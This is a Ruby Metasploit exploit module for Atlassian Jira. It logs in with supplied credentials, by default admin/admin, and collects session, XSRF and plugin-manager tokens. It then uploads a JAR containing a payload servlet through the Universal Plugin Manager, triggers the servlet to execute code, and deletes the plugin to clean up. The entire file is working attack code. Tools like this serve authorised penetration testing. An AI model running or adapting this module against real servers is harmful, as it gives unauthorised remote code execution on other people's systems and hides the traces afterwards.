## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Atlassian Jira Authenticated Upload Code Execution', 'Description' => %q{ This module can be used to execute a payload on Atlassian Jira via the Universal Plugin Manager(UPM). The module requires valid login credentials to an account that has access to the plugin manager. The payload is uploaded as a JAR archive containing a servlet using a POST request against the UPM component. The check command will test the validity of user supplied credentials and test for access to the plugin manager. }, 'Author' => 'Alexander Gonzalez(dubfr33)', 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'], ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'], ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/'] ], 'Platform' => %w[java], 'Targets' => [ ['Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ] ], 'DisclosureDate' => 'Feb 22 2018')) register_options( [ Opt::RPORT(2990), OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']), OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']), OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/']) ]) end def check login_res = query_login if login_res.nil? vprint_error('Unable to access the web application!') return CheckCode::Unknown end return CheckCode::Unknown unless login_res.code == 200 @session_id = get_sid(login_res) @xsrf_token = login_res.get_html_document.at('meta[@id="atlassian-token"]')['content'] auth_res = do_auth good_sid = get_sid(auth_res) good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}" res = query_upm(good_cookie) if res.nil? vprint_error('Unable to access the web application!') return CheckCode::Unknown elsif res.code == 200 return Exploit::CheckCode::Appears else vprint_status('Something went wrong, make sure host is up and options are correct!') vprint_status("HTTP Response Code: #{res.code}") return Exploit::CheckCode::Unknown end end def exploit unless access_login? fail_with(Failure::Unknown, 'Unable to access the web application!') end print_status('Retrieving Session ID and XSRF token...') auth_res = do_auth good_sid = get_sid(auth_res) good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}" res = query_for_upm_token(good_cookie) if res.nil? fail_with(Failure::Unknown, 'Unable to retrieve UPM token!') end upm_token = res.headers['upm-token'] upload_exec(upm_token, good_cookie) end # Upload, execute, and remove servlet def upload_exec(upm_token, good_cookie) contents = '' name = Rex::Text.rand_text_alpha(8..12) atlassian_plugin_xml = %Q{ 1.0 /plugins/servlet/metasploit/PayloadServlet /plugins/servlet/metasploit/PayloadServlet "#{name}" /metasploit/PayloadServlet } # Generates .jar file for upload zip = payload.encoded_jar zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml) servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class') zip.add_file('/metasploit/PayloadServlet.class', servlet) contents = zip.pack boundary = rand_text_numeric(27) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; " data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n" data << contents data << "\r\n--#{boundary}--" print_status("Attempting to upload #{name}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'rest/plugins/1.0/'), 'vars_get' => { 'token' => "#{upm_token}" }, 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Cookie' => good_cookie.to_s } }, 25) unless res && res.code == 202 print_status("Error uploading #{name}") print_status("HTTP Response Code: #{res.code}") print_status("Server Response: #{res.body}") return end print_status("Successfully uploaded #{name}") print_status("Executing #{name}") Rex::ThreadSafe.sleep(3) send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'), 'method' => 'GET', 'cookie' => good_cookie.to_s }) print_status("Deleting #{name}") send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"), 'method' => 'DELETE', 'cookie' => good_cookie.to_s }) end def access_login? res = query_login if res.nil? fail_with(Failure::Unknown, 'Unable to access the web application!') end return false unless res && res.code == 200 @session_id = get_sid(res) @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content'] return true end # Sends GET request to login page so the HTTP response can be used def query_login send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp')) end # Queries plugin manager to verify access def query_upm(good_cookie) send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'), 'method' => 'GET', 'cookie' => good_cookie.to_s }) end # Queries API for response containing upm_token def query_for_upm_token(good_cookie) send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'), 'method' => 'GET', 'cookie' => good_cookie.to_s }) end # Authenticates to webapp with user supplied credentials def do_auth send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'), 'method' => 'POST', 'cookie' => "atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}", 'vars_post' => { 'os_username' => datastore['HttpUsername'], 'os_password' => datastore['HttpPassword'], 'os_destination' => '', 'user_role' => '', 'atl_token' => '', 'login' => 'Log+In' } }) end # Finds SID from HTTP response headers def get_sid(res) if res.nil? return '' if res.blank? end res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || '' end end